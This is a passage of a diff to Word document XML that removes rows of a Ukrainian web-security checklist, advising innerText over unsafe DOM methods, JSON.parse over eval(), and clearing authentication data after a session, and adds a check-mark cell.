-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>4.12</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Переконайтеся в тому, що дані, що передаються з одного контексту</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>DOM</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> в інший</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>, використовуют</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> безпечні методи </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>JavaScript</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, такі як </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>InnerText</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> і </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>val</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ue</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>4.13</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Перевірка при аналізі JSON в браузерах, що JSON.parse використовується для розбору JSON на стороні клієнта. Не використовуйте Eval () для розбору JSON на стороні клієнта.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>4.14</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Переконайтеся, що дані</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> аутентифікації</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> видаляються зі сховища клієнта, наприклад, DOM</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> в браузері</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>, після того, як сеанс завершується.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="916"/>
-                <w:tab w:val="left" w:pos="1832"/>
-                <w:tab w:val="left" w:pos="2748"/>
-                <w:tab w:val="left" w:pos="3664"/>
-                <w:tab w:val="left" w:pos="4580"/>
-                <w:tab w:val="left" w:pos="5496"/>
-                <w:tab w:val="left" w:pos="6412"/>
-                <w:tab w:val="left" w:pos="7328"/>
-                <w:tab w:val="left" w:pos="8244"/>
-                <w:tab w:val="left" w:pos="9160"/>
-                <w:tab w:val="left" w:pos="10076"/>
-                <w:tab w:val="left" w:pos="10992"/>
-                <w:tab w:val="left" w:pos="11908"/>
-                <w:tab w:val="left" w:pos="12824"/>
-                <w:tab w:val="left" w:pos="13740"/>
-                <w:tab w:val="left" w:pos="14656"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -20116,8 +21676,19 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
